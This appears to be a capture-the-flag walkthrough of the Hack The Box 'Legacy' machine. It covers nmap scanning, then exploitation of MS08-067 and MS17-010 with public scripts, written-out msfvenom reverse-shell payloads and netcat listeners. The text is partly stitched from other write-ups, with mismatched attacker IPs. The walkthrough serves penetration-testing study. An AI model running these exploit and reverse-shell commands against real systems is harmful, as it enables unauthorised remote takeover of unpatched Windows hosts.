Legacy

Reconnaissance: NMAP

INITIAL:

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 10.10.10.4 

135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:2e:2e (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2023-12-14T05:22:36+02:00
|_clock-skew: mean: 5d00h57m37s, deviation: 1h24m51s, median: 4d23h57m37s

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.4

ALL PORTS:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p- 10.10.10.4  

UDP:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O -p- 10.10.10.4

Nmap shows just remote desktop (3389), and the SMB/NetBios ports (TCP 139, 445 and UDP 137) Our initial recon shows that the only point of entry is possibly through exploiting SMB.

Enumeration:

SMB: Null Auth

Neither smbmap nor smbclient show any ability to log in without authentication:

┌──(kali㉿kali)-[~]
└─$ smbmap -H 10.10.10.4

┌──(kali㉿kali)-[~]
└─$ smbclient -N -L //10.10.10.4

SMB: Vulnerabilities

SMB has had its fair share of vulnerabilities in the past, so let’s first run nmap scripts to determine if it is vulnerable. I can see a list of these scripts by looking at the files in the nmap scripts directory:

┌──(kali㉿kali)-[~]
└─$ ls /usr/share/nmap/scripts/ | grep smb | grep vuln 

┌──(kali㉿kali)-[~]
└─$ nmap -v -script smb-vuln* -p 139,445 10.10.10.4

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250

The result shows us that it is vulnerable to CVE-2009–3103 and CVE-2017–0143 and likely vulnerable to CVE-2008–4250. The target machine is running SMBv1 so we’ll go with CVE-2017–0143 (MS17–010). It looks like this box is vulnerable to two infamous SMB exploits, MS-08-067 (made famous by Conficker) and MS-17-010 (made famous by Shadow Brokers).

System Shell:

HTB: Legacy0xdf hacks stuff

Both of these vulnerabilities give a shell as system. Both also have Metasploit modules that are basically automatic pwns. But to make this interesting (and relevant to anyone doing PWK / OSCP), I’ll show how to do each without Metasploit.

MS-08-067

//Locate Exploit I’ll use the exploit from jivoi on Github here. It’s a python script that requires Impacket (which comes installed on Kali) and for me to replace the default shellcode with some of my own. (Interestingly, the default is a reverse TCP shell to 10.11.0.157… looks like the author may have been in PWK.)

https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.pyraw.githubusercontent.com

//Shellcode Generation To make the shellcode, I’ll use msfvenom. I’ll copy the bad characters list (-b) from the examples in the exploit code. I’ll use the following parameters:

┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows

-p windows/shell_reverse_tcp - This will connect back to me with a shell. Because I used shell_reverse_tcp it is unstaged, meaning the entire shell is in this code, and I can catch the callback with nc. Had I used shell/reverse_tcp, that would be a staged payload, and I’d need to use Metasploits exploit/multi/handler to get the callback.

LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread - defining the variables for the payload - my ip, the port, and how to exit.

-b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" - The bad characters not to use. I got this from the comments in the python code.

-f py - Output in python format. The examples use c format, and just pasted it in slightly differently. Either will work.

-v shellcode - Have the code set the variable shellcode, instead of the default, buf. I want this to match what it’s called in the code I’m using.

-a x86 and --platform windows - Describing the environment I’m attacking.

I’ll take this shellcode into the script, and paste it in replacing the default. I like to also paste in a comment above it with the msfvenom command string I ran to generate it so that when I come back to it someday, I’ll know what it’s doing.

//Guess Version The exploit requires that I know the version of Windows and the Language pack:

//Run Exploit I’ll open a nc listener, and run the exploit:

┌──(kali㉿kali)-[~]
└─$  nc -lnvp 443

┌──(kali㉿kali)-[~/Desktop]
└─$ python ms08-067.py 10.10.10.4 6 445

We have a reverse shell! Next, we need to figure out what privileges we are running with.

C:\WINDOWS\system32> whoami
C:\WINDOWS\system32> echo %username%

Whoami doesn’t seem to work and we can’t echo the username. Therefore, we’ll have to get creative. Kali has a whoami executable that we can import to our target machine.

┌──(kali㉿kali)-[~/Desktop]
└─$ locate whoami.exe           
/usr/share/windows-resources/binaries/whoami.exe

Both netcat and powershell are not installed on the target machine, so we can’t use them to import the executable. Therefore, let’s try and setup an SMB server for the transfer.

Locate the SMB server script on kali.

┌──(kali㉿kali)-[~/Desktop]
└─$ locate smbserver.py
/home/kali/.local/lib/python3.11/site-packages/impacket/smbserver.py
/home/kali/impacket/build/lib/impacket/smbserver.py
/home/kali/impacket/build/scripts-3.11/smbserver.py
/home/kali/impacket/examples/smbserver.py
/home/kali/impacket/impacket/smbserver.py
/home/kali/impacket/tests/SMB_RPC/test_smbserver.py
/opt/impacket-0.9.19/build/lib.linux-x86_64-2.7/impacket/smbserver.py
/opt/impacket-0.9.19/build/scripts-2.7/smbserver.py
/opt/impacket-0.9.19/examples/smbserver.py
/opt/impacket-0.9.19/impacket/smbserver.py
/usr/lib/python3/dist-packages/impacket/smbserver.py
/usr/lib/python3/dist-packages/scapy/layers/smbserver.py
/usr/local/bin/smbserver.py
/usr/share/doc/python3-impacket/examples/smbserver.py

Run the script to launch an SMB server on port 445 with the share name temp and the path to the whoami executable.

/usr/share/doc/python3-impacket/examples/smbserver.py

FIND USER.TXT

C:\WINDOWS\system32>cd \

C:\>dir user.txt /s
 Directory of C:\Documents and Settings\john\Desktop

C:\>cd \Documents and Settings\john\Desktop

C:\Documents and Settings\john\Desktop>type user.txt

FIND ROOT.TXT

C:\Documents and Settings\john\Desktop>cd \

C:\>dir root.txt /s
 Directory of C:\Documents and Settings\Administrator\Desktop

C:\>cd \Documents and Settings\Administrator\Desktop

C:\Documents and Settings\Administrator\Desktop>type root.txt

MS-17-010:

HTB: Legacy0xdf hacks stuff

//Locate Exploit There’s a few GitHubs out there with MS-17-010 code, but not as many that work on XP. My favorite is a fork of worawit’s MS17-010 repo by helviojunior. He added a send_and_execute.py, which I can give an executable and it will upload and run it.

GitHub - worawit/MS17-010: MS17-010GitHub

I’ll grab a copy of the script:

wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py

//Generate Payload I’ll use msfvenom again. This time, I don’t need to worry about bad characters or variable names, as I can use an exe:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe

//Run Exploit Now I’ll start a listener, and then run the exploit:

python send_and_execute.py 10.10.10.4 rev_10.10.14.14_443.exe

And I get a shell:

nc -lnvp 443

METASPLOIT:

Legacy Writeup w/o Metasploit | Hack The Box OSCP Preparationrana-khalil.gitbook.io

The vulnerability we’ll be exploiting is called Eternal Blue. This vulnerability exploited Microsoft’s implementation of the Server Message Block (SMB) protocol, where if an attacker sent a specially crafted packet, the attacker would be allowed to execute arbitrary code on the target machine.

I came across this article that explains how to exploit the Eternal Blue vulnerability without using Metasploit. We’ll use it to run the exploit on the target machine.

https://ethicalhackingguru.com/how-to-exploit-ms17-010-eternal-blue-without-metasploit/ethicalhackingguru.com

First, download the exploit code from Github.

GitHub - helviojunior/MS17-010: MS17-010GitHub

git clone https://github.com/helviojunior/MS17-010.git

Use MSFvenom to create a reverse shell payload (allowed on the OSCP as long as you’re not using meterpreter).

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f exe > eternalblue.exe

Start up a listener on your attack machine.

nc -nlvp 4444

Run the exploit.

python send_and_execute.py 10.10.10.4 ~/Desktop/eternalblue.exe

We have a reverse shell!